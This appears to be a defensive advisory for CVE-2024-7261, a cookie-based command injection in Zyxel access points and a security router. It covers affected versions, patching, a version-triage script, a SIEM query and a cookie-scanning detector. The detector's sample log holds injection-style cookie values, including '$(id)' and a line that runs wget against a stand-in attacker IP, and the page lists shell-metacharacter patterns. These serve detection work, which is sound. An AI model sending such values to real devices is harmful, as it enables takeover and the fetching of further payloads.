CVE-2024-7261

9.8 CRITICAL

📋 TL;DR

Unauthenticated OS command injection in the CGI program of several Zyxel access points and the USG LITE 60AX security router: special characters in the "host" parameter are not neutralized, so a remote attacker who can reach the device's web interface can execute arbitrary OS commands by sending a crafted cookie to the vulnerable CGI program. No credentials and no user interaction are required, which is why the bug carries a CVSS 9.8 rating. Organizations running the affected access points and security routers are at risk wherever the web interface is reachable.

💻 Affected Systems

Products:
  • Zyxel NWA1123ACv3
  • Zyxel WAC500
  • Zyxel WAX655E
  • Zyxel WBE530
  • Zyxel USG LITE 60AX
Versions (affected through and including the listed release):
  • NWA1123ACv3: 6.70(ABVT.4) and earlier
  • WAC500: 6.70(ABVS.4) and earlier
  • WAX655E: 7.00(ACDO.1) and earlier
  • WBE530: 7.00(ACLE.1) and earlier
  • USG LITE 60AX: V2.00(ACIP.2) and earlier
Operating Systems: Embedded firmware
Default Config Vulnerable: ⚠️ Yes
Notes: All default configurations are vulnerable; no special configuration is required for exploitation. The only precondition is that the attacker can send an HTTP request to the device's web interface, which on access points may be reachable from the client networks they serve unless management traffic is isolated.

📦 What is this software?

The affected products are Zyxel wireless access points (NWA1123ACv3, WAC500, WAX655E, WBE530) and the USG LITE 60AX security router. All of them are configured through an embedded web management interface served by CGI programs on the device firmware, which is where the vulnerable code lives.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise leading to network infiltration, data exfiltration, ransomware deployment, and use as pivot point for lateral movement.

🟠

Likely Case

Device takeover enabling network reconnaissance, credential harvesting, and installation of persistent backdoors.

🟢

If Mitigated

Limited impact if the web management interface is reachable only from a trusted management network (strict ingress filtering, dedicated management VLAN), so that untrusted clients cannot send requests to the CGI program at all.

🌐 Internet-Facing: HIGH - Unauthenticated remote exploitation with CVSS 9.8 score indicates critical risk for internet-exposed devices.
🏢 Internal Only: MEDIUM - The attack surface is smaller, but any host that can reach the management interface, including a compromised workstation or a wireless client on an AP whose management interface is not isolated from client traffic, can exploit the bug without credentials.

🎯 Exploit Status

Public PoC: ❌ No
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation needs only a single crafted HTTP request carrying a malicious cookie and no authentication, so the bug is easily weaponizable even without a public PoC. Expect exploit code to emerge; treat exposed devices as if one already exists.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check vendor advisory for specific fixed versions per product

Vendor Advisory: https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-os-command-injection-vulnerability-in-aps-and-security-router-devices-09-03-2024

Restart Required: Yes

Instructions:

1. Visit the Zyxel support portal and locate the firmware for your exact model (the version strings are model-specific, so a build for a different model will not apply).
2. Download the latest firmware for that model.
3. Back up the current configuration.
4. Upload the firmware via the web interface.
5. Apply the update.
6. Reboot the device.
7. Verify the running version (System Information in the web UI, or 'show version' on the CLI) matches the fixed version given in the advisory.

🔧 Temporary Workarounds

Network Segmentation (applies to: all affected products)

Isolate affected devices in a dedicated management VLAN with strict firewall rules, so that only designated management hosts can reach their web interface.

Access Control (applies to: all affected products)

Restrict management interface access to trusted IP addresses only, and never expose the interface to the Internet.

🧯 If You Can't Patch

  • Immediately isolate affected devices from the Internet and from critical network segments; block all inbound access to their web interface except from a management network
  • Monitor and alert on HTTP requests to the devices' CGI endpoints, in particular cookie values carrying shell metacharacters (see Detection & Monitoring below)

🔍 How to Verify

Check if Vulnerable:

Compare the running firmware version (web interface or CLI) with the affected-version list above; a version at or below the one listed for your model is vulnerable.

Check Version:

Log in to the device web interface and check System Information, or use the CLI command 'show version'.

Verify Fix Applied:

Verify that the running firmware version matches or exceeds the fixed version listed in the vendor advisory for your specific model. Since version strings are model-specific, compare against the entry for your model rather than simply checking that the number is "newer".
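The comparison described in the three checks above, as an added example (not Zyxel's tooling and not code from this page's source): it parses the version string format used in the affected-version list and reports whether a device is at or below the last affected revision for its model. The interpretation of the format (a model-specific build tag such as ABVT plus a release revision) and the inventory data are assumptions for illustration; treat the output as a triage aid and confirm the fixed version against the vendor advisory.

```python
"""Compare a Zyxel firmware version string with the affected-version list on this page.

Added example, not Zyxel tooling. Assumed version format: "[V]<major>.<minor>(<TAG>.<rev>)",
e.g. "6.70(ABVT.4)". The tag is treated as a per-model build identifier and the trailing
number as the release revision within that tag; a device is considered affected when its tag
matches the model's tag and (major, minor, rev) is at or below the last affected value.
"""
import re
from typing import NamedTuple

VERSION_RE = re.compile(
    r"^V?(?P<major>\d+)\.(?P<minor>\d+)\((?P<tag>[A-Z]+)\.(?P<rev>\d+)\)$"
)

# Last affected firmware per model, copied from the Affected Systems section above.
LAST_AFFECTED = {
    "NWA1123ACv3": "6.70(ABVT.4)",
    "WAC500": "6.70(ABVS.4)",
    "WAX655E": "7.00(ACDO.1)",
    "WBE530": "7.00(ACLE.1)",
    "USG LITE 60AX": "V2.00(ACIP.2)",
}


class FwVersion(NamedTuple):
    major: int
    minor: int
    tag: str
    rev: int

    def ordinal(self) -> tuple:
        """Comparable part of the version (the tag is a model identifier, not an order)."""
        return (self.major, self.minor, self.rev)


def parse_version(text: str) -> FwVersion:
    """Parse a version string as shown in System Information or 'show version' output."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Zyxel version string: {text!r}")
    return FwVersion(int(m["major"]), int(m["minor"]), m["tag"], int(m["rev"]))


def is_affected(model: str, running: str) -> bool:
    """True if the running firmware of `model` is in the affected range for CVE-2024-7261.

    Raises if the model is not on the list or the version belongs to a different build line,
    so that a mismatch is never silently reported as 'not affected'.
    """
    if model not in LAST_AFFECTED:
        raise KeyError(f"{model!r} is not in this page's affected-product list")
    last = parse_version(LAST_AFFECTED[model])
    cur = parse_version(running)
    if cur.tag != last.tag:
        raise ValueError(
            f"{running!r} carries build tag {cur.tag}, expected {last.tag} for {model}"
        )
    return cur.ordinal() <= last.ordinal()


def triage(inventory: dict) -> dict:
    """Map {hostname: (model, version)} to 'AFFECTED', 'not affected' or 'ERROR: ...'."""
    result = {}
    for host, (model, version) in inventory.items():
        try:
            result[host] = "AFFECTED" if is_affected(model, version) else "not affected"
        except (KeyError, ValueError) as exc:
            result[host] = f"ERROR: {exc}"
    return result


if __name__ == "__main__":
    # Constructed inventory for demonstration; hostnames and versions are made up.
    inventory = {
        "ap-lobby": ("NWA1123ACv3", "6.70(ABVT.4)"),
        "ap-floor2": ("WAX655E", "7.00(ACDO.2)"),
        "fw-branch": ("USG LITE 60AX", "V2.00(ACIP.2)"),
        "ap-old": ("WBE530", "6.70(ACLE.3)"),  # older major.minor, still affected
        "ap-mislabelled": ("WAC500", "6.70(ABVT.4)"),  # tag mismatch -> error, not "safe"
    }
    for host, status in triage(inventory).items():
        print(f"{host:16} {status}")
```

A tag mismatch is reported as an error rather than "not affected" on purpose: an inventory record that pairs a model with another model's firmware string is more likely a data problem than a patched device, and silently clearing it would hide a vulnerable unit.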

📡 Detection & Monitoring

Log Indicators:

  • HTTP requests to the devices' CGI endpoints from unexpected sources, or with unusually long or malformed cookie values
  • Shell metacharacters (;, |, `, $) or command strings in HTTP cookie values, including percent-encoded forms such as %3B or %7C
  • Successful logins to the web interface that do not match a known administrator session, with or without preceding failed attempts (exploitation itself needs no login, so a failed-login pattern alone is a weak signal; it matters as evidence of post-compromise access)

Network Indicators:

  • HTTP requests to the management interface with cookie values containing shell metacharacters
  • Outbound connections from networking devices to unexpected destinations (second-stage downloads, reverse shells, command-and-control traffic)

SIEM Query:

source="web_proxy_logs" AND (uri="*.cgi" OR uri="*.cgi?*") AND (cookie CONTAINS ";" OR cookie CONTAINS "|" OR cookie CONTAINS "`" OR cookie CONTAINS "$" OR cookie CONTAINS "%3B" OR cookie CONTAINS "%7C" OR cookie CONTAINS "%60" OR cookie CONTAINS "%24")

Note: this is a generic pseudo-query; adapt the source and field names to your SIEM. Cookie values are only present in logs from a reverse proxy, WAF or packet capture placed in front of the device; plain firewall connection logs do not carry HTTP headers. A literal ";" is also the normal separator between cookies, so that clause needs tuning or the logic below to avoid false positives.
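To make the query concrete, here is an added example (not from this page's source or from Zyxel) of the same detection logic applied to a few constructed log lines. It assumes JSON-lines records from a reverse proxy or WAF in front of the device with src_ip, uri and cookie fields (assumed field names), decodes percent-encoding before matching, and accounts for ";" being the legitimate separator between cookies. The path /cgi-bin/example.cgi, the addresses and the cookie values are placeholders.

```python
"""Flag HTTP requests to CGI endpoints whose Cookie header carries shell syntax.

Added example for CVE-2024-7261 triage; not Zyxel code. Input: JSON-lines records with
'src_ip', 'uri' and 'cookie' fields (assumed names), e.g. from a reverse proxy or WAF log.
"""
import json
import re
from urllib.parse import unquote, urlsplit

# Metacharacters an injected command would need inside the cookie value. ';' is checked
# separately because it is also the legitimate separator between cookies.
META_RE = re.compile(r"[|`$&]")
# Conservative shape of a cookie name; anything else after a ';' means the ';' was part of
# a value, i.e. the header is not a plain list of name=value pairs.
NAME_RE = re.compile(r"^[A-Za-z0-9_.\-]+$")


def is_cgi_request(uri: str) -> bool:
    """True for a request whose path (query string ignored) ends in .cgi."""
    return urlsplit(uri).path.lower().endswith(".cgi")


def suspicious_cookies(cookie_header: str) -> list:
    """Return the names of cookies whose value looks like it carries shell syntax.

    Percent-encoded forms (%3B, %7C, %60, %24 ...) are decoded first. A literal ';' inside
    a value shows up as an extra segment that is not a valid name=value pair; that segment
    is attributed to the preceding cookie name.
    """
    flagged = []
    current = None
    for seg in cookie_header.split(";"):
        seg = seg.strip()
        if not seg:
            continue
        name, eq, raw_value = seg.partition("=")
        name = name.strip()
        if not eq or not NAME_RE.match(name):
            owner = current or name
            if owner not in flagged:
                flagged.append(owner)
            continue
        current = name
        value = unquote(raw_value)
        if (META_RE.search(value) or ";" in value) and name not in flagged:
            flagged.append(name)
    return flagged


def scan(lines) -> list:
    """Return (src_ip, uri, [cookie names]) for CGI requests with suspicious cookies."""
    findings = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # not a record we understand; skip rather than abort the scan
        uri, cookie = rec.get("uri", ""), rec.get("cookie", "")
        if not is_cgi_request(uri) or not cookie:
            continue
        names = suspicious_cookies(cookie)
        if names:
            findings.append((rec.get("src_ip"), uri, names))
    return findings


# Constructed sample records; IPs, paths and cookie values are made up for illustration.
SAMPLE_LOG = """\
{"src_ip": "10.0.0.5", "uri": "/cgi-bin/example.cgi?cmd=1", "cookie": "session=abc123; lang=en"}
{"src_ip": "203.0.113.7", "uri": "/cgi-bin/example.cgi", "cookie": "session=x;id>/tmp/out"}
{"src_ip": "203.0.113.7", "uri": "/cgi-bin/example.cgi", "cookie": "host=127.0.0.1%3Bwget%20http://203.0.113.7/x"}
{"src_ip": "10.0.0.9", "uri": "/index.html", "cookie": "token=`id`"}
{"src_ip": "198.51.100.2", "uri": "/cgi-bin/example.cgi?x=1", "cookie": "pref=$(id)"}
""".splitlines()

if __name__ == "__main__":
    for src, uri, names in scan(SAMPLE_LOG):
        print(f"{src:15} {uri:30} suspicious cookies: {', '.join(names)}")
```

Two limitations worth knowing before relying on this: an injected command that itself has the shape name=value (for example a shell variable assignment) passes the name check, and a proxy that does not log the Cookie header at all yields nothing. Pair the rule with baselining of which sources normally talk to the CGI endpoints, and confirm that cookie logging is actually enabled on the device in front.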

🔗 References

  • Zyxel security advisory: https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-os-command-injection-vulnerability-in-aps-and-security-router-devices-09-03-2024
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2024-7261